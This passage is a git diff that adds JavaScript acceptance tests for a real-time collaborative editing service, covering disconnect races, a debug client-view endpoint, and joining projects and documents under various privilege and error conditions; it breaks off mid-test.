RealTimeClient.disconnectAllClients(done) + }) + + // trigger and check cleanup + it('should have disconnected all previous clients', function (done) { + return RealTimeClient.getConnectedClients((error, data) => { + if (error) { + return done(error) + } + expect(data.length).to.equal(0) + return done() + }) + }) + + return describe('with two clients in the project', function () { + beforeEach(function (done) { + return async.series( + [ + cb => { + this.clientA = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + this.clientB = RealTimeClient.connect(this.project_id, cb) + }, + ], + done + ) + }) + + return describe('starting to drain', function () { + beforeEach(function (done) { + return async.parallel( + [ + cb => { + return this.clientA.on('reconnectGracefully', cb) + }, + cb => { + return this.clientB.on('reconnectGracefully', cb) + }, + + cb => drain(2, cb), + ], + done + ) + }) + + afterEach(function (done) { + return drain(0, done) + }) // reset drain + + it('should not timeout', function () { + return expect(true).to.equal(true) + }) + + return it('should not have disconnected', function () { + expect(this.clientA.socket.connected).to.equal(true) + return expect(this.clientB.socket.connected).to.equal(true) + }) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/EarlyDisconnect.js b/services/real-time/test/acceptance/js/EarlyDisconnect.js new file mode 100644 index 0000000..84c9f89 --- /dev/null +++ b/services/real-time/test/acceptance/js/EarlyDisconnect.js @@ -0,0 +1,265 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
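+//
+// These tests reproduce disconnect races: the client drops the connection
+// while joinProject, joinDoc or clientTracking.updatePosition is still in
+// flight, and the assertions check that no stale pub/sub subscriptions
+// (editor-events / applied-ops) or redis presence entries
+// (clients_in_project) are left behind.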
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const async = require('async') +const { expect } = require('chai') + +const RealTimeClient = require('./helpers/RealTimeClient') +const MockDocUpdaterServer = require('./helpers/MockDocUpdaterServer') +const MockWebServer = require('./helpers/MockWebServer') +const FixturesManager = require('./helpers/FixturesManager') + +const settings = require('@overleaf/settings') +const redis = require('@overleaf/redis-wrapper') +const rclient = redis.createClient(settings.redis.pubsub) +const rclientRT = redis.createClient(settings.redis.realtime) +const KeysRT = settings.redis.realtime.key_schema + +describe('EarlyDisconnect', function () { + before(function (done) { + return MockDocUpdaterServer.run(done) + }) + + describe('when the client disconnects before joinProject completes', function () { + before(function () { + // slow down web-api requests to force the race condition + this.actualWebAPIjoinProject = MockWebServer.joinProject + MockWebServer.joinProject = (...args) => + setTimeout(() => this.actualWebAPIjoinProject(...args), 300) + }) + + after(function () { + return (MockWebServer.joinProject = this.actualWebAPIjoinProject) + }) + + beforeEach(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb() + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect(this.project_id, cb) + // disconnect after the handshake and before joinProject completes + setTimeout(() => this.clientA.disconnect(), 100) + this.clientA.on('disconnect', () => cb()) + }, + + cb => { + // wait for joinDoc and subscribe + return setTimeout(cb, 500) + }, + ], + done + ) + }) + + // we can force the race condition, there is no need to repeat too often + return Array.from(Array.from({ length: 5 }).map((_, i) => i + 1)).map( + attempt => + it(`should not subscribe to the pub/sub channel anymore (race ${attempt})`, function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + expect(resp).to.not.include(`editor-events:${this.project_id}`) + return done() + }) + return null + }) + ) + }) + + describe('when the client disconnects before joinDoc completes', function () { + beforeEach(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb() + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect( + this.project_id, + (error, project, privilegeLevel, protocolVersion) => { + this.project = project + this.privilegeLevel = privilegeLevel + this.protocolVersion = protocolVersion + return cb(error) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.clientA.emit('joinDoc', this.doc_id, () => {}) + // disconnect before joinDoc completes + this.clientA.on('disconnect', () => cb()) + 
return this.clientA.disconnect() + }, + + cb => { + // wait for subscribe and unsubscribe + return setTimeout(cb, 100) + }, + ], + done + ) + }) + + // we can not force the race condition, so we have to try many times + return Array.from(Array.from({ length: 20 }).map((_, i) => i + 1)).map( + attempt => + it(`should not subscribe to the pub/sub channels anymore (race ${attempt})`, function (done) { + rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + expect(resp).to.not.include(`editor-events:${this.project_id}`) + + return rclient.pubsub('CHANNELS', (err, resp) => { + if (err) { + return done(err) + } + expect(resp).to.not.include(`applied-ops:${this.doc_id}`) + return done() + }) + }) + return null + }) + ) + }) + + return describe('when the client disconnects before clientTracking.updatePosition starts', function () { + beforeEach(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb() + } + ) + }, + + cb => { + this.clientA = RealTimeClient.connect( + this.project_id, + (error, project, privilegeLevel, protocolVersion) => { + this.project = project + this.privilegeLevel = privilegeLevel + this.protocolVersion = protocolVersion + return cb(error) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { lines: this.lines, version: this.version, ops: this.ops }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + return this.clientA.emit('joinDoc', this.doc_id, cb) + }, + + cb => { + this.clientA.emit( + 'clientTracking.updatePosition', + { + row: 42, + column: 36, + doc_id: this.doc_id, + }, + () => {} + ) + // disconnect before updateClientPosition completes + this.clientA.on('disconnect', () => cb()) + return this.clientA.disconnect() + }, + + cb => { + // wait for updateClientPosition + return setTimeout(cb, 100) + }, + ], + done + ) + }) + + // we can not force the race condition, so we have to try many times + return Array.from(Array.from({ length: 20 }).map((_, i) => i + 1)).map( + attempt => + it(`should not show the client as connected (race ${attempt})`, function (done) { + rclientRT.smembers( + KeysRT.clientsInProject({ project_id: this.project_id }), + (err, results) => { + if (err) { + return done(err) + } + expect(results).to.deep.equal([]) + return done() + } + ) + return null + }) + ) + }) +}) diff --git a/services/real-time/test/acceptance/js/HttpControllerTests.js b/services/real-time/test/acceptance/js/HttpControllerTests.js new file mode 100644 index 0000000..ce84b1a --- /dev/null +++ b/services/real-time/test/acceptance/js/HttpControllerTests.js @@ -0,0 +1,105 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
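+//
+// Exercises the debug endpoint GET /clients/:clientId served by the real-time
+// app itself (port 3026, see settings.internal.realTime): 404 for an unknown
+// client id, otherwise a JSON view of the connected client's session details
+// and the rooms it has joined.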
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const async = require('async') +const { expect } = require('chai') +const request = require('request').defaults({ + baseUrl: 'http://127.0.0.1:3026', +}) + +const RealTimeClient = require('./helpers/RealTimeClient') +const FixturesManager = require('./helpers/FixturesManager') + +describe('HttpControllerTests', function () { + describe('without a user', function () { + return it('should return 404 for the client view', function (done) { + const clientId = 'not-existing' + return request.get( + { + url: `/clients/${clientId}`, + json: true, + }, + (error, response, data) => { + if (error) { + return done(error) + } + expect(response.statusCode).to.equal(404) + return done() + } + ) + }) + }) + + return describe('with a user and after joining a project', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + }, + (error, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(error) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + {}, + (error, { doc_id: docId }) => { + this.doc_id = docId + return cb(error) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit('joinDoc', this.doc_id, cb) + }, + ], + done + ) + }) + + return it('should send a client view', function (done) { + return request.get( + { + url: `/clients/${this.client.socket.sessionid}`, + json: true, + }, + (error, response, data) => { + if (error) { + return done(error) + } + expect(response.statusCode).to.equal(200) + expect(data.connected_time).to.exist + delete data.connected_time + // .email is not set in the session + delete data.email + expect(data).to.deep.equal({ + client_id: this.client.socket.sessionid, + first_name: 'Joe', + last_name: 'Bloggs', + project_id: this.project_id, + user_id: this.user_id, + rooms: [this.project_id, this.doc_id], + }) + return done() + } + ) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/JoinDocTests.js b/services/real-time/test/acceptance/js/JoinDocTests.js new file mode 100644 index 0000000..547691d --- /dev/null +++ b/services/real-time/test/acceptance/js/JoinDocTests.js @@ -0,0 +1,589 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
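+//
+// joinDoc is exercised across privilege levels (readAndWrite, readOnly,
+// owner) and argument shapes (with and without a fromVersion and an options
+// object). In each case the mocked document-updater should be asked for the
+// doc (fromVersion -1 when no catch-up is requested) and the client should
+// end up in the doc room.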
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') + +const RealTimeClient = require('./helpers/RealTimeClient') +const MockDocUpdaterServer = require('./helpers/MockDocUpdaterServer') +const FixturesManager = require('./helpers/FixturesManager') + +const async = require('async') + +describe('joinDoc', function () { + before(function () { + this.lines = ['test', 'doc', 'lines'] + this.version = 42 + this.ops = ['mock', 'doc', 'ops'] + return (this.ranges = { mock: 'ranges' }) + }) + + describe('when authorised readAndWrite', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { + lines: this.lines, + version: this.version, + ops: this.ops, + ranges: this.ranges, + }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit( + 'joinDoc', + this.doc_id, + (error, ...rest) => { + ;[...this.returnedArgs] = Array.from(rest) + return cb(error) + } + ) + }, + ], + done + ) + }) + + it('should get the doc from the doc updater', function () { + return MockDocUpdaterServer.getDocument + .calledWith(this.project_id, this.doc_id, -1) + .should.equal(true) + }) + + it('should return the doc lines, version, ranges and ops', function () { + return this.returnedArgs.should.deep.equal([ + this.lines, + this.version, + this.ops, + this.ranges, + ]) + }) + + return it('should have joined the doc room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.doc_id)).to.equal(true) + return done() + } + ) + }) + }) + + describe('when authorised readOnly', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readOnly', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { + lines: this.lines, + version: this.version, + ops: this.ops, + ranges: this.ranges, + }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit( + 'joinDoc', + this.doc_id, + (error, ...rest) => { + ;[...this.returnedArgs] = Array.from(rest) + return cb(error) + } + ) + }, + ], + done + ) + }) + + it('should get the doc from the doc updater', function () { + return MockDocUpdaterServer.getDocument + .calledWith(this.project_id, this.doc_id, -1) + .should.equal(true) + }) + + it('should return the doc lines, version, ranges and ops', function () { + return this.returnedArgs.should.deep.equal([ + this.lines, + this.version, + this.ops, + this.ranges, + ]) + }) + + return it('should have joined the doc room', function (done) { + return 
RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.doc_id)).to.equal(true) + return done() + } + ) + }) + }) + + describe('when authorised as owner', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { + lines: this.lines, + version: this.version, + ops: this.ops, + ranges: this.ranges, + }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit( + 'joinDoc', + this.doc_id, + (error, ...rest) => { + ;[...this.returnedArgs] = Array.from(rest) + return cb(error) + } + ) + }, + ], + done + ) + }) + + it('should get the doc from the doc updater', function () { + return MockDocUpdaterServer.getDocument + .calledWith(this.project_id, this.doc_id, -1) + .should.equal(true) + }) + + it('should return the doc lines, version, ranges and ops', function () { + return this.returnedArgs.should.deep.equal([ + this.lines, + this.version, + this.ops, + this.ranges, + ]) + }) + + return it('should have joined the doc room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.doc_id)).to.equal(true) + return done() + } + ) + }) + }) + + // It is impossible to write an acceptance test to test joining an unauthorized + // project, since joinProject already catches that. If you can join a project, + // then you can join a doc in that project. 
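+  // (Server-side, doc access is still checked on every joinDoc call by
+  // _assertClientAuthorization in WebsocketController, which falls back to
+  // DocumentUpdaterManager.checkDocument when no doc-level access has been
+  // cached yet; the cases below exercise the invalid-id and
+  // fromVersion/options paths instead.)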
+ + describe('for an invalid doc', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { + lines: this.lines, + version: this.version, + ops: this.ops, + ranges: this.ranges, + }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit( + 'joinDoc', + 'invalid-doc-id', + (error, ...rest) => { + this.error = error + return cb() + } + ) + }, + ], + done + ) + }) + + it('should not get the doc from the doc updater', function () { + return MockDocUpdaterServer.getDocument + .calledWith(this.project_id, 'invalid-doc-id') + .should.equal(false) + }) + + it('should return an invalid id error', function () { + this.error.message.should.equal('invalid id') + }) + + return it('should not have joined the doc room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes('invalid-doc-id')).to.equal( + false + ) + return done() + } + ) + }) + }) + + describe('with a fromVersion', function () { + before(function (done) { + this.fromVersion = 36 + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { + lines: this.lines, + version: this.version, + ops: this.ops, + ranges: this.ranges, + }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit( + 'joinDoc', + this.doc_id, + this.fromVersion, + (error, ...rest) => { + ;[...this.returnedArgs] = Array.from(rest) + return cb(error) + } + ) + }, + ], + done + ) + }) + + it('should get the doc from the doc updater with the fromVersion', function () { + return MockDocUpdaterServer.getDocument + .calledWith(this.project_id, this.doc_id, this.fromVersion) + .should.equal(true) + }) + + it('should return the doc lines, version, ranges and ops', function () { + return this.returnedArgs.should.deep.equal([ + this.lines, + this.version, + this.ops, + this.ranges, + ]) + }) + + return it('should have joined the doc room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.doc_id)).to.equal(true) + return done() + } + ) + }) + }) + + describe('with options', function () { + before(function (done) { + this.options = { encodeRanges: true } + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { + lines: this.lines, + version: this.version, + ops: this.ops, + ranges: this.ranges, + }, + (e, { 
doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit( + 'joinDoc', + this.doc_id, + this.options, + (error, ...rest) => { + ;[...this.returnedArgs] = Array.from(rest) + return cb(error) + } + ) + }, + ], + done + ) + }) + + it('should get the doc from the doc updater with the default fromVersion', function () { + return MockDocUpdaterServer.getDocument + .calledWith(this.project_id, this.doc_id, -1) + .should.equal(true) + }) + + it('should return the doc lines, version, ranges and ops', function () { + return this.returnedArgs.should.deep.equal([ + this.lines, + this.version, + this.ops, + this.ranges, + ]) + }) + + return it('should have joined the doc room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.doc_id)).to.equal(true) + return done() + } + ) + }) + }) + + return describe('with fromVersion and options', function () { + before(function (done) { + this.fromVersion = 36 + this.options = { encodeRanges: true } + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'readAndWrite', + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + return FixturesManager.setUpDoc( + this.project_id, + { + lines: this.lines, + version: this.version, + ops: this.ops, + ranges: this.ranges, + }, + (e, { doc_id: docId }) => { + this.doc_id = docId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, cb) + }, + + cb => { + return this.client.emit( + 'joinDoc', + this.doc_id, + this.fromVersion, + this.options, + (error, ...rest) => { + ;[...this.returnedArgs] = Array.from(rest) + return cb(error) + } + ) + }, + ], + done + ) + }) + + it('should get the doc from the doc updater with the fromVersion', function () { + return MockDocUpdaterServer.getDocument + .calledWith(this.project_id, this.doc_id, this.fromVersion) + .should.equal(true) + }) + + it('should return the doc lines, version, ranges and ops', function () { + return this.returnedArgs.should.deep.equal([ + this.lines, + this.version, + this.ops, + this.ranges, + ]) + }) + + return it('should have joined the doc room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.doc_id)).to.equal(true) + return done() + } + ) + }) + }) +}) diff --git a/services/real-time/test/acceptance/js/JoinProjectTests.js b/services/real-time/test/acceptance/js/JoinProjectTests.js new file mode 100644 index 0000000..bfb354c --- /dev/null +++ b/services/real-time/test/acceptance/js/JoinProjectTests.js @@ -0,0 +1,861 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
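+//
+// Acceptance tests for the 'joinProject' flow. They cover successful joins
+// (owner and anonymous token access), rejected joins (not authorized, 403,
+// 404, invalid project id, rate limited), and repeat the same cases for the
+// automatic join performed on connect.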
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') + +const RealTimeClient = require('./helpers/RealTimeClient') +const MockWebServer = require('./helpers/MockWebServer') +const FixturesManager = require('./helpers/FixturesManager') + +const async = require('async') + +describe('joinProject', function () { + describe('when authorized', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect( + this.project_id, + (error, project, privilegeLevel, protocolVersion) => { + this.project = project + this.privilegeLevel = privilegeLevel + this.protocolVersion = protocolVersion + return cb(error) + } + ) + }, + ], + done + ) + }) + + it('should get the project from web', function () { + return MockWebServer.joinProject + .calledWith(this.project_id, this.user_id) + .should.equal(true) + }) + + it('should return the project', function () { + return this.project.should.deep.equal({ + name: 'Test Project', + owner: { _id: this.user_id }, + }) + }) + + it('should return the privilege level', function () { + return this.privilegeLevel.should.equal('owner') + }) + + it('should return the protocolVersion', function () { + return this.protocolVersion.should.equal(2) + }) + + it('should have joined the project room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.project_id)).to.equal( + true + ) + return done() + } + ) + }) + + return it('should have marked the user as connected', function (done) { + return this.client.emit( + 'clientTracking.getConnectedUsers', + (error, users) => { + if (error) return done(error) + let connected = false + for (const user of Array.from(users)) { + if ( + user.client_id === this.client.publicId && + user.user_id === this.user_id + ) { + connected = true + break + } + } + expect(connected).to.equal(true) + return done() + } + ) + }) + }) + + describe('when authorized with token', function () { + before(function (done) { + async.series( + [ + cb => { + FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + publicAccess: 'readOnly', + project: { + name: 'Test Project', + }, + }, + ( + e, + { + user_id: ownerId, + project_id: projectId, + anonymousAccessToken, + } + ) => { + this.ownerId = ownerId + this.project_id = projectId + this.anonymousAccessToken = anonymousAccessToken + cb(e) + } + ) + }, + + cb => { + RealTimeClient.setAnonSession( + this.project_id, + this.anonymousAccessToken, + cb + ) + }, + + cb => { + this.client = RealTimeClient.connect( + this.project_id, + (error, project, privilegeLevel, protocolVersion) => { + this.project = project + this.privilegeLevel = privilegeLevel + this.protocolVersion = protocolVersion + cb(error) + } + ) + }, + ], + done + ) + }) + + it('should get the project from web', function () { + MockWebServer.joinProject + .calledWith( + this.project_id, + 'anonymous-user', + this.anonymousAccessToken + ) + .should.equal(true) + }) + 
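+    // The anonymous token user sees the project with the owner's id, and
+    // their privilege level comes from the project's publicAccess setting
+    // ('readOnly' here) rather than from project membership.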
+ it('should return the project', function () { + this.project.should.deep.equal({ + name: 'Test Project', + owner: { _id: this.ownerId }, + }) + }) + + it('should return the privilege level', function () { + this.privilegeLevel.should.equal('readOnly') + }) + + it('should return the protocolVersion', function () { + this.protocolVersion.should.equal(2) + }) + + it('should have joined the project room', function (done) { + RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.project_id)).to.equal( + true + ) + done() + } + ) + }) + + it('should have marked the user as connected', function (done) { + this.client.emit('clientTracking.getConnectedUsers', (error, users) => { + if (error) return done(error) + let connected = false + for (const user of Array.from(users)) { + if (user.client_id === this.client.publicId) { + connected = true + break + } + } + expect(connected).to.equal(true) + done() + }) + }) + }) + + describe('when not authorized', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + privilegeLevel: null, + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + return cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect( + this.project_id, + (error, project, privilegeLevel, protocolVersion) => { + this.error = error + this.project = project + this.privilegeLevel = privilegeLevel + this.protocolVersion = protocolVersion + return cb() + } + ) + }, + ], + done + ) + }) + + it('should return an error', function () { + return this.error.message.should.equal('not authorized') + }) + + return it('should not have joined the project room', function (done) { + return RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + error => { + expect(error.message).to.equal('not found') + return done() + } + ) + }) + }) + + describe('when not authorized and web replies with a 403', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + project_id: '403403403403403403403403', // forbidden + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, error => { + this.error = error + cb() + }) + }, + ], + done + ) + }) + + it('should return an error', function () { + this.error.message.should.equal('not authorized') + }) + + it('should not have joined the project room', function (done) { + RealTimeClient.getConnectedClient(this.client.socket.sessionid, error => { + expect(error.message).to.equal('not found') + done() + }) + }) + }) + + describe('when deleted and web replies with a 404', function () { + before(function (done) { + return async.series( + [ + cb => { + return FixturesManager.setUpProject( + { + project_id: '404404404404404404404404', // not-found + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect(this.project_id, error => { + this.error = error + cb() + }) + }, + ], + done + ) + }) + + it('should 
return an error', function () { + this.error.code.should.equal('ProjectNotFound') + }) + + it('should not have joined the project room', function (done) { + RealTimeClient.getConnectedClient(this.client.socket.sessionid, error => { + expect(error.message).to.equal('not found') + done() + }) + }) + }) + + describe('when invalid', function () { + before(function (done) { + MockWebServer.joinProject.resetHistory() + return async.series( + [ + cb => { + this.client = RealTimeClient.connect('invalid-id', error => { + this.error = error + return cb() + }) + }, + ], + done + ) + }) + + it('should return an invalid id error', function () { + this.error.message.should.equal( + 'missing/bad ?projectId=... query flag on handshake' + ) + }) + + it('should not call to web', function () { + MockWebServer.joinProject.called.should.equal(false) + }) + }) + + describe('when over rate limit', function () { + before(function (done) { + return async.series( + [ + cb => { + this.client = RealTimeClient.connect( + '429429429429429429429429', // rate-limited + error => { + this.error = error + return cb() + } + ) + }, + ], + done + ) + }) + + return it('should return a TooManyRequests error code', function () { + this.error.message.should.equal('rate-limit hit when joining project') + return this.error.code.should.equal('TooManyRequests') + }) + }) + + describe('when automatically joining the project', function () { + describe('when authorized', function () { + before(function (done) { + async.series( + [ + cb => { + FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId + this.user_id = userId + cb(e) + } + ) + }, + + cb => { + this.client = RealTimeClient.connect( + this.project_id, + (err, project, permissionsLevel, protocolVersion) => { + this.project = project + this.permissionsLevel = permissionsLevel + this.protocolVersion = protocolVersion + cb(err) + } + ) + }, + ], + done + ) + }) + + it('should get the project from web', function () { + MockWebServer.joinProject + .calledWith(this.project_id, this.user_id) + .should.equal(true) + }) + + it('should return the project', function () { + this.project.should.deep.equal({ + name: 'Test Project', + owner: { _id: this.user_id }, + }) + }) + + it('should return the privilege level', function () { + this.permissionsLevel.should.equal('owner') + }) + + it('should return the protocolVersion', function () { + this.protocolVersion.should.equal(2) + }) + + it('should have joined the project room', function (done) { + RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.project_id)).to.equal( + true + ) + done() + } + ) + }) + + it('should have marked the user as connected', function (done) { + this.client.emit('clientTracking.getConnectedUsers', (error, users) => { + if (error) return done(error) + let connected = false + for (const user of Array.from(users)) { + if ( + user.client_id === this.client.publicId && + user.user_id === this.user_id + ) { + connected = true + break + } + } + expect(connected).to.equal(true) + done() + }) + }) + }) + + describe('when authorized with token', function () { + before(function (done) { + async.series( + [ + cb => { + FixturesManager.setUpProject( + { + privilegeLevel: 'owner', + publicAccess: 'readOnly', + project: { + name: 'Test Project', + }, + }, + ( + e, + { + user_id: 
ownerId, + project_id: projectId, + anonymousAccessToken, + } + ) => { + this.ownerId = ownerId + this.project_id = projectId + this.anonymousAccessToken = anonymousAccessToken + cb(e) + } + ) + }, + + cb => { + RealTimeClient.setAnonSession( + this.project_id, + this.anonymousAccessToken, + cb + ) + }, + + cb => { + this.client = RealTimeClient.connect( + this.project_id, + (err, project, permissionsLevel, protocolVersion) => { + this.project = project + this.permissionsLevel = permissionsLevel + this.protocolVersion = protocolVersion + cb(err) + } + ) + }, + ], + done + ) + }) + + it('should get the project from web', function () { + MockWebServer.joinProject + .calledWith( + this.project_id, + 'anonymous-user', + this.anonymousAccessToken + ) + .should.equal(true) + }) + + it('should return the project', function () { + this.project.should.deep.equal({ + name: 'Test Project', + owner: { _id: this.ownerId }, + }) + }) + + it('should return the privilege level', function () { + this.permissionsLevel.should.equal('readOnly') + }) + + it('should return the protocolVersion', function () { + this.protocolVersion.should.equal(2) + }) + + it('should have joined the project room', function (done) { + RealTimeClient.getConnectedClient( + this.client.socket.sessionid, + (error, client) => { + if (error) return done(error) + expect(Array.from(client.rooms).includes(this.project_id)).to.equal( + true + ) + done() + } + ) + }) + + it('should have marked the user as connected', function (done) { + this.client.emit('clientTracking.getConnectedUsers', (error, users) => { + if (error) return done(error) + let connected = false + for (const user of Array.from(users)) { + if (user.client_id === this.client.publicId) { + connected = true + break + } + } + expect(connected).to.equal(true) + done() + }) + }) + }) + + describe('when not authorized', function () { + let joinProjectResponseReceived = false + before(function (done) { + async.series( + [ + cb => { + FixturesManager.setUpProject( + { + privilegeLevel: null, + project: { + name: 'Test Project', + }, + }, + (e, { project_id: projectId, user_id: userId }) => { + this.project_id = projectId 